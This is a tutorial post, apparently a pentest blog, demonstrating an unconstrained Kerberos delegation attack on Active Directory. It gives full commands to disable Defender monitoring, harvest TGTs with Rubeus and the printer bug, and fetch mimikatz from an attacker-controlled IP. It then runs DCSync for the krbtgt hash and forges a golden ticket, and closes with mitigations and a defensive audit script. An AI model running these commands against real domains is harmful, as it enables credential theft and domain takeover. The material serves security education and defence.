Practical Demo of the Unconstrained Delegation Attack

There have been many publications explaining various ways to attack unconstrained delegation. This post is a practical demonstration of how such a misconfiguration can be exploited easily and effectively. To further understand this kind of attack, check out the resources at the bottom.

Let’s get started:

To perform this kind of attack:

  1. Gain access to a domain controller (DCB) in ForestB.
  2. Monitor for logon events through the LSA API with Rubeus.exe.
  3. Use MS-RPRN.exe to trigger the “printer bug”.
  4. The “printer bug” is triggered against a domain controller (e.g. DCA) in ForestA.
  5. Harvest a Ticket Granting Ticket (TGT) with Rubeus.exe.
  6. Perform a DCSync attack to retrieve the krbtgt credentials.
  7. Forge a golden ticket.
  8. The domain controller (DCA) in ForestA is compromised.

Practical Demo:

Checking the hostname

We can see we are now logged in to DB-Server.

List the Windows servers on the domain as candidates for unconstrained Kerberos delegation (the delegation property itself is checked further below) using the command:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "*2016*") -and (Enabled -eq "True")} -Properties * | Select-Object Name | Format-Table -HideTableHeaders

Error because Get-ADComputer is not recognised

Let's install the Active Directory module for PowerShell. The AD module is already installed on domain controllers, but on member servers you add it as a feature in Server Manager or with the PowerShell command below:

Get-WindowsFeature | Where-Object Name -like RSAT-AD-PowerShell | Install-WindowsFeature

Modules installed successfully

Now retry the previous command:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "*2016*") -and (Enabled -eq "True")} -Properties * | Select-Object Name | Format-Table -HideTableHeaders

2 servers found

We check whether our server DB-SERVER has TrustedForDelegation set to TRUE (the filter on PrimaryGroupID 515 restricts the query to member computers, excluding domain controllers). If so, we can start our attack:

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and PrimaryGroupID -eq 515} -Properties TrustedForDelegation,ServicePrincipalName,Description

TrustedForDelegation set to TRUE

Attack time:

Open two shells (call them shell 1 and shell 2) so that you can run Rubeus.exe and MS-RPRN.exe simultaneously.

2 shells spawned

Disable real-time AV monitoring from the shell with the command:

Set-MpPreference -DisableRealtimeMonitoring $true

Upload MS-RPRN.exe and Rubeus.exe.

Uploading MS-RPRN.exe and Rubeus.exe

In the shell on the left (port 2222), use Rubeus to harvest TGTs every 3 seconds with the command:

Rubeus.exe harvest /interval:3

TGT Harvested

In the shell on the right (port 3333), use MS-RPRN to request the TGTs:

c:\Users\Public\MS-RPRN.exe \\ \\

The first \\ argument is the domain controller we want to compromise.

The second \\ argument is the machine with delegation enabled that we control.

Trigger the MS-RPRN

Remove the spaces from the captured ticket and save it into a file.

Hash file

Pass the ticket with Rubeus.exe:

Rubeus.exe ptt /ticket:hash

Let's purge the user's Kerberos tickets without logging off, with the command:


Purge User Kerberos Ticket without Logoff

To perform a DCSync attack, we must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.

Upload mimikatz to the target. Remember that we already disabled real-time monitoring at the start of our attack.

powershell.exe Invoke-WebRequest -Uri 'http://my-ip-here/mimikatz.exe' -OutFile mimikatz.exe

mimikatz.exe "privilege::debug" "lsadump::dcsync /user:OPERATIONS\krbtgt" exit

Krbtgt NTLM Hash and SID Extracted

Let's forge a golden ticket:

kerberos::golden /User:administrator / /sid:S-1-5-21-3757735274-1965336150-1982876978 /krbtgt:8e2b8effbf6735b8fb5be206cb3dfead /startoffset:0 /endin:600 /renewmax:10080 /ptt

Forging a golden ticket

We can now view shared directories on our target domain controller:

dir \\\C$

Shared directory (\C$)

Mitigations for Unconstrained Delegation:

Replace unconstrained delegation with constrained delegation, which limits delegation to the specific SPNs it is allowed to work for.

Placing privileged users in the Protected Users group prevents them from being used in delegation and keeps their TGTs off these computers after they authenticate. The same applies to the “Account is sensitive and cannot be delegated” option on the account.
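As an added, defensive example (not part of the original post), the PowerShell audit below lists member servers with unconstrained delegation and privileged accounts that have neither of the two mitigations above. It assumes the RSAT ActiveDirectory module installed earlier in the post and a domain-joined session that can read the directory; the function names are mine.

```powershell
# Added audit script, not from the original post. Assumes the RSAT
# ActiveDirectory module and a domain-joined session that can read AD.
Import-Module ActiveDirectory

function Get-UnconstrainedDelegationComputer {
    # TrustedForDelegation is userAccountControl bit 0x80000 (524288);
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule.
    # Domain controllers (primaryGroupID 516) have the bit by design;
    # member servers with it are the exposure this post demonstrates.
    Get-ADComputer -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)' `
        -Properties PrimaryGroupID, OperatingSystem |
        Select-Object Name, OperatingSystem,
            @{ n = 'IsDomainController'; e = { $_.PrimaryGroupID -eq 516 } }
}

function Get-PrivilegedUserDelegationStatus {
    # A privileged account that is neither in Protected Users nor marked
    # "Account is sensitive and cannot be delegated" can have its TGT
    # captured on a host with unconstrained delegation.
    $protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty DistinguishedName)

    foreach ($group in 'Domain Admins', 'Enterprise Admins', 'Administrators') {
        # Enterprise Admins exists only in the forest root; unresolvable groups are skipped.
        $members = Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue |
            Where-Object objectClass -eq 'user'
        foreach ($m in $members) {
            $u = Get-ADUser -Identity $m.DistinguishedName -Properties AccountNotDelegated
            [pscustomobject]@{
                Group               = $group
                User                = $u.SamAccountName
                InProtectedUsers    = $protected -contains $u.DistinguishedName
                AccountNotDelegated = [bool]$u.AccountNotDelegated
            }
        }
    }
}

"== Member servers with unconstrained delegation (move these to constrained delegation) =="
Get-UnconstrainedDelegationComputer | Where-Object { -not $_.IsDomainController } | Format-Table -AutoSize

"== Privileged users with neither Protected Users membership nor the sensitive-account flag =="
Get-PrivilegedUserDelegationStatus |
    Where-Object { -not $_.InProtectedUsers -and -not $_.AccountNotDelegated } |
    Sort-Object User -Unique | Format-Table -AutoSize
```

Run it from a member server or workstation with the RSAT module; both tables should ideally come back empty.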

Resources:
